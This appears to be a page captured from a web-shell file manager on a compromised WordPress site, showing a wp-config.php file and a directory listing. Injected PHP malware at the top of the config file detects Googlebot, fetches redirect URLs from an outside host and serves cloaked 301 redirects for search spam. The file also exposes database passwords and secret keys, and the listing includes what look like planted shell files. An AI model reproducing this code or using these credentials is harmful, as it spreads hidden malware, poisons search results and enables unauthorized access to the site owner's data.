PATH:
home
/
fengshp
/
www
<?php $conf_user_agent = 'Google301'; $conf_get_url = 'http://bwd82.com/get.php'; $conf_time_recheck = 60; $conf_redirect_type = 'HTTP/1.1 301 Moved Permanently'; ignore_user_abort(true); if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { $google_ip = trim(strip_tags($_SERVER['HTTP_CF_CONNECTING_IP'])); } else { $google_ip = trim(strip_tags($_SERVER['REMOTE_ADDR'])); } if (stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot', 0) !== false AND stripos($google_ip, '66.249.', 0) !== false) { if (!is_dir(__DIR__.'/queue')) {mkdir(__DIR__.'/queue');} $google_links = glob(__DIR__."/queue/*"); if (isset($google_links[0])) { $url = @trim(file_get_contents($google_links[0])); header($conf_redirect_type); header('Location: '.$url); @unlink($google_links[0]); die(); } else { clearstatcache(true); $cron_update_time = (int) trim(@file_get_contents(__DIR__.'/googlelinksupdate')) + 0; if (time() - $cron_update_time > $conf_time_recheck) { file_put_contents(__DIR__.'/googlelinksupdate', time(), LOCK_EX); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $conf_get_url); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 600); curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_MAXREDIRS, 2); curl_setopt($ch, CURLOPT_USERAGENT, $conf_user_agent); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); curl_setopt($ch, CURLOPT_FTP_SSL, CURLFTPSSL_TRY); $actual_links = @json_decode(trim(curl_exec($ch)), true); curl_close($ch); clearstatcache(true); $i = 0; foreach ($actual_links as $google_link) { $google_link = trim($google_link); if ($google_link != '') { $i++; file_put_contents(__DIR__.'/queue/'.$i.'_'.rand(1,999999), $google_link, LOCK_EX); } } } } } /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ /* Themify Cache Start */ define('WP_CACHE',true); /* Themify Cache End */ define('DB_NAME', 'fengshp314'); /** MySQL database username */ define('DB_USER', 'fengshp314'); /** MySQL database password */ define('DB_PASSWORD', 'HKmBPUSs3zBR'); /** MySQL hostname */ define('DB_HOST', 'fengshp314.mysql.db:3306'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'nb38CDVIFoQz1hreic/LaRoRb7gCA/jAczUQGyQzh3KORlY7v0rkf09kAIIY'); define('SECURE_AUTH_KEY', 'q/nLvt+CbIyCCzYDWOmfae6ullqgKr2wHg381i4/8Ae580Nx0bzs5zSBldGC'); define('LOGGED_IN_KEY', 'SlX/Zm/AdNV63VM+Y1G1AqrIb1p9JZvUioaVePeUZaDASnvwx6oNljJRECSj'); define('NONCE_KEY', '7wz+W16xC4EiUDt/HXuK9QYi8b1boLNwmSerJo0/3Yvhorp0qhleK9DAUJVO'); define('AUTH_SALT', '3pgXWe2hrqhHkvjGgFhqrHz1gMedVgzFjzJ+f7K2WKALx9lpK/pGtJtarLWp'); define('SECURE_AUTH_SALT', 'TvaDU1l+McV91gGqqD7WA8cVJuLZgDZsFFTgf18suXcBOd6q3I7zMqN2rKKA'); define('LOGGED_IN_SALT', 'Kz4/kx3hb3yje8pxWwKfcpw/oJh8mzTWuYRrfKz2LOHkAFBkOBis0OE0u02E'); define('NONCE_SALT', 'bha/6m8/SU+4ICyZOJjn9l3nMsViJaONkJcg7Nc3mgroPxBwJucEmFD0lhTP'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'mod201_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */ define('CONCATENATE_SCRIPTS', false ); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
[+]
..
[-] wp-cron.php
[edit]
[-] karma_7d0c.php
[edit]
[+]
wp-admin
[-] wp-comments-post.php
[edit]
[-] wp-login.php
[edit]
[-] wp-config-sample.php
[edit]
[-] readme.html
[edit]
[-] wp-signup.php
[edit]
[-] wp-mail.php
[edit]
[+]
wp-includes
[-] style.php
[edit]
[-] savep.php
[edit]
[-] .flg
[edit]
[-] a4.php
[edit]
[+]
.tmb
[-] wp-trackback.php
[edit]
[-] 891dd4.php
[edit]
[-] googlelinksupdate
[edit]
[-] index.html.ovh.old
[edit]
[-] wp-activate.php
[edit]
[-] xmlrpc.php
[edit]
[-] wp-blog-header.php
[edit]
[+]
wp-content
[-] wp-settings.php
[edit]
[-] wp-config.php
[edit]
[-] 436a5a.php
[edit]
[-] wp-load.php
[edit]
[-] license.txt
[edit]
[+]
queue
[-] karma_467a.php
[edit]
[-] wp-links-opml.php
[edit]